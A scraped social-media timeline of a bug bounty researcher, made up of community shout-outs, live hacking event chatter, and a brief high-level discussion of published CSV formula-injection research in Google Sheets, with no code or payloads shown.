Hx01

580 posts

Hx01

@Hxzeroone

Not evil just misunderstood.

Alcatraz Prison,SF Beigetreten Ağustos 2017

153 Folgt5.3K Follower

Angehefteter Tweet

Hx01@Hxzeroone·11 Eyl

LOOK MOM, I’M ON TV!!

bugcrowd@Bugcrowd

Last year, @Hxzeroone challenged himself to earn $100k in bounties by his 18th birthday. We sat down with him to talk about his Bug Bounty Journey, tips for staying motivated, and hitting his next Bugcrowd milestone! 🎉 bugcrowd.com/blog/researche…

English

152

Hx01@Hxzeroone·21 Kas

@ldionmarcil @sml555_ @codecancare Yes , we had reported issues to such platforms and got them fixed where their connectors and recipes were directly vulnerable.

English

Louis Dion-Marcil@ldionmarcil·20 Kas

@Hxzeroone @sml555_ @codecancare or is the issue here that those automation frameworks (Zapier, Workato, Make) somehow make Sheets evaluate the CSV formulas prior to the user opening the sheet and granting access? were you able to reproduce this directly, ie with a trial on these services?

English

Hx01@Hxzeroone·19 Kas

Hello! Just published a new research with ( @sml555_ , @codecancare) 🍻 Who Needs A Blind XSS? hx01.me/hailcsv.htm #CyberSecurity #BugBounty

English

213

12.3K

Hx01@Hxzeroone·20 Kas

This has been a recent implementation in Google sheets prior to that there wasn’t any warning , it would auto-run once they were implemented. Also to be noted , if the formulaes are allowed once ,they are not asked to be accepted again meaning an sheet that has previously added their own formuales and is ingesting data from attacker supplied sources would still be vulnerable. Apart from that the same can be achieved on Microsoft Excel.

English

Louis Dion-Marcil@ldionmarcil·20 Kas

@Hxzeroone @sml555_ @codecancare I can't reproduce this in Google Sheets, getting a pop-up: "Warning: Some formulas are trying to send and receive data from external parties." Doesn't successful exploitation imply someone manually allowed access, justifying the "social engineering" responses your team got?

English

Hx01@Hxzeroone·22 Eyl

@Hack_All_Things Rest in peace 🙏

English

290

Roy Davis@Hack_All_Things·21 Eyl

Peace out world. Best wishes to all. ALS has won this battle, but hopefully not the war!

English

131

1.6K

146.7K

Hx01@Hxzeroone·17 Oca

@securibee @d0nutptr @0xAshFox @NahamSec @seclilc @DanielMiessler @Jhaddix @0xtavian @stokfredrik @bsysop @b1tc0de @notshenetworks @drunkrhin0 ❤️

QME

252

Bee 🐝@securibee·15 Oca

Lastly, thank you to all subscribers and everyone who, directly and indirectly, contributed to my journey so far. Here are some shoutouts: @d0nutptr @0xAshFox @NahamSec @seclilc @DanielMiessler @Jhaddix @0xtavian @stokfredrik @bsysop @b1tc0de @notshenetworks @drunkrhin0 @Hxzeroone @codingo_ @zseano @AlbonyCal @mcipekci @InsiderPhD @hakluke @corg_e @pry0cc

English

5.4K

Bee 🐝@securibee·15 Oca

After 3 years of writing the Hive Five newsletter 36 months of thoughtful curation 155 Sundays of focused work 12277 links shared It's time...

English

31.7K

Hx01 retweetet

shubs@infosec_au·25 Haz

I had a great time at @Hacker0x01's H1-4420 in London. Was great working with @TomAnthonySEO, @Hxzeroone, @codecancare and @seanyeoh! This event also produced this tool: github.com/assetnote/surf which led to about $26k worth of bounties at this event.

English

108

489

46.4K

Hx01@Hxzeroone·24 Haz

@alicanact60 @umr4n6 @ArmanSameer95 @infosec_au @TomAnthonySEO @JosipFranjkovic @ryotkak @Rhynorater @itscachemoney @Arl_rose @0xLupin @iambouali It was great meeting y’all as well 🥰

English

595

Ali Tütüncü@alicanact60·24 Haz

Also, I met amazing people @umr4n6 @ArmanSameer95 @Hxzeroone @infosec_au @TomAnthonySEO @JosipFranjkovic @ryotkak @Rhynorater @itscachemoney @Arl_rose @0xLupin @iambouali and many more! Happy to meet you, everyone. You all are amazing people!

English

Ali Tütüncü@alicanact60·24 Haz

Just participated in a live hacking event with @Hacker0x01 in London🇬🇧! This is my first LHE with HackerOne! Proud to finish 3rd on the @Zoom leaderboard and 4th overall. Feeling thrilled and accomplished! #h14420 #bugbounty

English

281

42.2K

Hx01@Hxzeroone·31 May

@mcipekci @bugraeskici @bsysop @sw33tLie @codecancare @restr1ct3d @HusseiN98D @dogwhohacks Congratulations 🥳

English

187

Mustafa Can İPEKÇİ@mcipekci·31 May

Also shout out to all these mad lads helped me on the journey @bugraeskici @Hxzeroone @bsysop @sw33tLie @codecancare @restr1ct3d @HusseiN98D @dogwhohacks and many others whom I missed!

English

3.3K

Mustafa Can İPEKÇİ@mcipekci·31 May

I'm proud to announce that with today's payouts I hit 1M$ all time earning combined from all platforms and external programs I participated. 3/4 of these earnings coming from @SynackRedTeam and rest on @Bugcrowd, @Hacker0x01 and some good external programs :). #BugBounty

English

382

33.1K

Hx01@Hxzeroone·24 May

@hakluke @rez0__ Looks good.

English

282

Luke Stephens (hakluke)@hakluke·23 May

@rez0__ It looks good to me! I'll defer to the OAuth master @Hxzeroone for the final opinion though. I think the last arrow should go all the way to the user.

English

1.2K

Joseph Thacker@rez0__·23 May

It's really cool combined with chatgpt:

Luke Stephens (hakluke)@hakluke

This looks cool!

English

14.4K

Hx01@Hxzeroone·10 Şub

The first tweet couldnt fit in all the amazing people @Farah_Hawaa @sh_timmy @vortexau @codingo_ @streaak @iangcarroll @rez0__ @mcipekci

English

2.1K

Hx01@Hxzeroone·10 Şub

Since we are acknowledging the great relationships we’ve formed in bug-bounties i’d also like to thank the friends ive formed along the way @infosec_au @codecancare @HusseiN98D @sw33tLie @ITSecurityguard @m0chan98 @0xd0m7 @bsysop @d00xing @sml555_ @RelentlessT7

shubs@infosec_au

i’ve been able to achieve great things through teamwork and greatly respect the following people @rhyselsmore, @HusseiN98D, @fransrosen, @Hxzeroone, @codecancare, @seanyeoh, @samwcyo. We’ve had a lot of fun together, the bounties don’t even matter at some point.

English

12.5K

Hx01@Hxzeroone·10 Şub

@infosec_au @rhyselsmore @HusseiN98D @fransrosen @codecancare @seanyeoh @samwcyo 💖 Thank you shubs , you’ve made my day here as well , You have been a great bro and thank you for being the person i could count on & roast the hell out at the same time.

English

574

shubs@infosec_au·10 Şub

English

19.9K

shubs@infosec_au·10 Şub

when i find someone i enjoy collaborating with in bug bounties, we build a relationship that lasts a lifetime. i deeply appreciate all the people that i’ve had the chance to work with positively. although there are many people i actively avoid working with now.

English

132

21.4K

Hx01@Hxzeroone·26 Kas

@HusseiN98D @codecancare @infosec_au @zseano @rez0__ @m0chan98 @mcipekci @rhyselsmore @m4ll0k @Yassineaboukir @PaulosYibelo @hacker_ @pry0cc @akita_zen @snyff @joohoi @fransrosen @brutelogic @s0md3v 💛💛

QME

Hussein Daher@HusseiN98D·25 Kas

Beasts 🔥 @codecancare @infosec_au @Hxzeroone @zseano @rez0__ Eduuu, Patrik, @m0chan98 @mcipekci @rhyselsmore @m4ll0k @Yassineaboukir @PaulosYibelo @hacker_ @pry0cc @akita_zen @snyff @joohoi @fransrosen @brutelogic @s0md3v

Hussein Daher@HusseiN98D·25 Kas

Tag a hacker that you're grateful to, and always look up to in your journey.. We're all humans after all, show some recognition to those you love! ❤️‍🩹 I'll start..

English

171

381

Hx01 retweetet

bugcrowd@Bugcrowd·18 Eyl

Who is Hx01? 👤 September's Researcher Spotlight with 8+ years of experience hacking! Check out this impressive #bugbounty journey below! 👣 #BugBountyTips #ItTakesACrowd bugcrowd.com/blog/researche…

English

Hx01@Hxzeroone·4 Ağu

@ArmanSameer95 @Hacker0x01 @Zoom I hacked for 2 days pre-vacation. 😉

English

TESS@ArmanSameer95·4 Ağu

@Hacker0x01 @Zoom @Hxzeroone I thought you’re on vacation 👀

English

HackerOne@Hacker0x01·4 Ağu

The #H1702 Day 1 leaderboard is live! 👀 Are you following along to see who will compete for @Zoom Vigilante (aka MVH)? leaderboards.hackerone.live/H1-702-day-1

English

Hx01@Hxzeroone·30 Tem

@_mrd7_ @thedawgyg I’m remote sadly.

English

MRD7@_mrd7_·30 Tem

@thedawgyg "Storm Area 51" --> This event in 2019 comes to my mind. @Hxzeroone Are you planning to raid Area 51 again?

GIF

English

dawgyg - WoH@thedawgyg·30 Tem

I wanna debate aliens with someone.. who follows me and doesn't believe in aliens and wants to debate/discuss it? it still amazes me that theres so many people today that dont believe in aliens. #Aliens #Area51

English

Hx01 retweetet

Hussein Daher@HusseiN98D·22 May

I and @Hxzeroone somehow broke the internet this week. A total of approximately 200 reports sent so far across #Bugbounty platforms for this 0day. All the giants are affected. I mean it.

English

277

Hx01 retweetet

Hussein Daher@HusseiN98D·25 Oca

It's finally live - I'm sorry for the time this took! The workshop I gave at @THREAT_CON is now live on Udemy for a discounted price. The price will go back to $149 at the end of the week . More details to follow. udemy.com/course/bug-bou…

English

386

Hx01@Hxzeroone·9 Ara

🙏🏻

bugcrowd@Bugcrowd

Congrats @Hxzeroone for reaching an ambitious goal! 👏 With the amazing collaboration and efforts (not to mention memes 🔥) we saw in the #TeamHunt2021, we’re honored to be a part of this milestone! Great work! 😎

ART

Entdecken

@ldionmarcil @sml555_ @codecancare @Hack_All_Things @securibee @d0nutptr @0xAshFox @NahamSec